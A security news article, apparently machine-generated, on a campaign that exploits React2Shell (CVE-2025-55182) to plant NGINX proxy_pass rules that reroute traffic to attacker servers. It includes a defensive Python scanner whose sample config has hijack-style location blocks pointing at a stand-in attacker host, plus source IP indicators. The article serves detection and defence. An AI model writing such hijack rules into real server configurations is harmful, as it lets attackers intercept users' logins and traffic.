Ethical Hacking News

Hijacking Web Traffic: The React2Shell Exploit and its Implications for Cybersecurity




A web traffic hijacking campaign has been uncovered in which attackers exploit the React2Shell vulnerability (CVE-2025-55182), a critical remote code execution flaw in React Server Components, and then plant malicious configurations in the NGINX installations and management panels of the compromised hosts. Those configurations route legitimate web traffic through backend servers the attackers control, with targeting focused on Asian TLDs, Chinese hosting infrastructure, and government and educational TLDs. The campaign underlines the need to patch known vulnerabilities promptly and to monitor web-server configuration for unauthorized changes.

  • The React2Shell vulnerability (CVE-2025-55182), a critical flaw in React Server Components, has been exploited by threat actors to hijack web traffic flowing through NGINX servers on the compromised hosts, with targeting focused on Asian TLDs and Chinese hosting infrastructure.
  • The attackers use shell scripts to inject malicious configurations into NGINX, designed to capture incoming requests on predefined URL paths.
  • A multi-stage toolkit provides persistence and generates the configuration files that carry the malicious directives.
  • GreyNoise has observed that two IP addresses account for 56% of all exploitation attempts seen two months after React2Shell was publicly disclosed.
  • The attackers' approach suggests an interest in interactive access rather than automated resource extraction. Separately, GreyNoise has reported a coordinated reconnaissance campaign against Citrix ADC Gateway and NetScaler Gateway infrastructure.



  • The recent disclosure of a web traffic hijacking campaign built on exploitation of the React2Shell vulnerability (CVE-2025-55182) has drawn wide attention in the security community. This article covers the details of the exploit, what it means for NGINX installations and management panels, and the broader context in which it sits.

    React2Shell, a remote code execution flaw in React Server Components rated at the maximum severity of 10.0 on the Common Vulnerability Scoring System (CVSS), has been widely exploited by threat actors. Once they have code execution on a host, the attackers turn to the NGINX server running alongside the vulnerable application: according to Datadog Security Labs, they write malicious NGINX configurations that intercept legitimate web traffic between users and websites and route it through their own backend servers.

    The campaign targets Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure (Baota Panel), and government and educational TLDs (.edu, .gov). The attackers use shell scripts to inject configurations into NGINX that capture incoming requests on certain predefined URL paths and proxy them, via the "proxy_pass" directive, to domains under the attackers' control. Because proxy_pass forwards the request server-side rather than issuing a redirect, the user's browser still shows the legitimate site while the attacker's backend sees every request and response on those paths.

    The post-exploitation tooling is a multi-stage toolkit that handles target discovery, persistence, and the creation of configuration files carrying the malicious directives. Its components include:

    * zx.sh: an orchestrator script that fetches and executes the subsequent stages through legitimate utilities such as curl or wget.
    * bt.sh: a script that targets the Baota (BT) Management Panel environment and overwrites its NGINX configuration files.
    * 4zdh.sh: a script that enumerates common NGINX configuration locations and takes steps to avoid errors when writing the new configuration.
    * zdh.sh: a script with narrower targeting, focused mainly on Linux or containerized NGINX configurations and on top-level domains such as .in and .id.
    * ok.sh: a script that generates a report listing all active NGINX traffic hijacking rules.

    The practical lesson is twofold: patch React2Shell where the vulnerable React Server Components packages are present, and treat the NGINX configuration directories (including those of management panels such as Baota) as assets to audit, since that is where this campaign leaves its footprint.
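The hijacking configs described above share one structural signature: a location block whose proxy_pass points at a host that is not a local or private backend. The following scanner, an added example that is neither Datadog's tooling nor the attackers' scripts, parses NGINX configuration text for that pattern. It resolves named upstream blocks to their server entries so that a legitimate "proxy_pass http://php_backend;" is not flagged, and it treats only loopback, RFC 1918, link-local and allowlisted hosts as trusted. The directory list (standard NGINX paths plus the Baota panel vhost directory) and the sample config with the attacker host "cdn.evil.example" and the IP 203.0.113.45 are constructed assumptions for the example, not indicators from the report.

```python
"""Scan NGINX configs for location blocks that proxy traffic to external hosts.

Added example for the React2Shell/NGINX hijacking write-up; not the campaign's
scripts and not Datadog's code.  Paths, allowlist and the sample config below
are assumptions made for illustration.
"""
import ipaddress
import re
from pathlib import Path
from urllib.parse import urlsplit

# Directories worth sweeping on a suspect host (assumed defaults).
NGINX_CONFIG_DIRS = [
    "/etc/nginx",
    "/usr/local/nginx/conf",
    "/www/server/panel/vhost/nginx",  # Baota (BT) panel vhost directory
]
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "::1"}

# Loopback, RFC 1918, link-local and ULA ranges.  Deliberately narrower than
# ipaddress.is_private, which also treats documentation ranges such as
# 203.0.113.0/24 as private and would hide the constructed sample below.
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

_LOCATION_RE = re.compile(r"\blocation\s+(?:[=~*^]+\s+)?(\S+)\s*\{")
_UPSTREAM_RE = re.compile(r"\bupstream\s+(\S+)\s*\{")
_PROXY_PASS_RE = re.compile(r"\bproxy_pass\s+([^;]+);")
_SERVER_RE = re.compile(r"\bserver\s+([^;\s]+)")


def _block_body(text, brace_index):
    """Text between the '{' at brace_index and its matching '}' (brace-depth walk)."""
    depth = 0
    for i in range(brace_index, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[brace_index + 1:i]
    return text[brace_index + 1:]  # unterminated block: take the rest


def _host_of(target):
    """Hostname part of a proxy_pass target or an upstream 'server' entry."""
    url = target if "://" in target else "//" + target
    return urlsplit(url).hostname or target


def _is_local(host):
    if host in ALLOWED_HOSTS:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # bare hostnames are external unless allowlisted
    return any(ip in net for net in _INTERNAL_NETS)


def find_external_proxy_targets(config_text):
    """Return (location, proxy_pass_target, offending_host) tuples for every
    location whose upstream is not loopback/private/allowlisted."""
    text = re.sub(r"#.*", "", config_text)  # drop comments first

    upstreams = {}
    for m in _UPSTREAM_RE.finditer(text):
        body = _block_body(text, m.end() - 1)
        upstreams[m.group(1)] = [_host_of(s) for s in _SERVER_RE.findall(body)]

    findings = []
    for m in _LOCATION_RE.finditer(text):
        location = m.group(1)
        body = _block_body(text, m.end() - 1)
        for target in _PROXY_PASS_RE.findall(body):
            target = target.strip()
            host = _host_of(target)
            for h in upstreams.get(host, [host]):  # resolve named upstreams
                hit = (location, target, h)
                if not _is_local(h) and hit not in findings:  # nested locations dedup
                    findings.append(hit)
    return findings


def scan_config_dirs(dirs=NGINX_CONFIG_DIRS):
    """Walk the config directories and map each file to its external proxy targets."""
    report = {}
    for d in dirs:
        if not Path(d).is_dir():
            continue
        for path in Path(d).rglob("*"):
            if not path.is_file():
                continue
            try:
                hits = find_external_proxy_targets(path.read_text(errors="replace"))
            except OSError:
                continue
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample: one legitimate local upstream, two hijack-style locations.
SAMPLE_CONFIG = """
upstream php_backend { server 127.0.0.1:9000; }

server {
    listen 80;
    server_name example.edu;

    location / { proxy_pass http://php_backend; }          # legitimate

    location ~* ^/(login|admin|download) {
        proxy_pass http://203.0.113.45:8080;               # constructed attacker IP
        proxy_set_header Host $host;
    }
    location /static/ {
        proxy_pass https://cdn.evil.example;               # constructed attacker domain
    }
}
"""

if __name__ == "__main__":
    for hit in find_external_proxy_targets(SAMPLE_CONFIG):
        print("location %-30s -> %s  (host %s)" % hit)
    for file, hits in scan_config_dirs().items():
        print(file, hits)
```

Run it as-is to see the two flagged locations from the sample; on a real host the second loop reports per-file hits from the configured directories. Legitimate reverse proxies to public upstreams (a CDN, a SaaS backend) will also be flagged, so the output is a review list, not a verdict; add such hosts to ALLOWED_HOSTS once confirmed.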

    The threat intelligence firm GreyNoise has observed that two IP addresses, 193.142.147[.]209 and 87.121.84[.]24, account for 56% of all exploitation attempts seen two months after React2Shell was publicly disclosed. In total, 1,083 unique source IP addresses were involved in React2Shell exploitation between January 26 and February 2, 2026.

    The attackers' handling of compromised hosts suggests an interest in interactive access rather than automated resource extraction. In a separate finding, GreyNoise also reported a coordinated reconnaissance campaign against Citrix ADC Gateway and NetScaler Gateway infrastructure that used tens of thousands of residential proxies and a single Microsoft Azure IP address ("52.139.3[.]76") to discover login panels.

    That campaign ran in two distinct modes: a large, distributed login-panel discovery operation using residential proxy rotation, and a concentrated AWS-hosted version-disclosure sprint. Running both suggests complementary objectives, finding login panels and then enumerating their versions, and points to coordination between the two operations rather than unrelated scanning.

    Defenders should patch the vulnerable React Server Components packages, audit NGINX configuration directories (including management-panel paths) for unexpected proxy_pass targets, and review access logs for the source addresses GreyNoise has identified.







    Related Information:
  • https://www.ethicalhackingnews.com/articles/Hijacking-Web-Traffic-The-React2Shell-Exploit-and-its-Implications-for-Cybersecurity-ehn.shtml

  • https://thehackernews.com/2026/02/hackers-exploit-react2shell-to-hijack.html

  • https://www.csoonline.com/article/4127554/threat-actors-hijack-web-traffic-after-exploiting-react2shell-vulnerability-report.html

  • https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • https://www.cvedetails.com/cve/CVE-2025-55182/


  • Published: Wed Feb 4 23:38:52 2026 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.
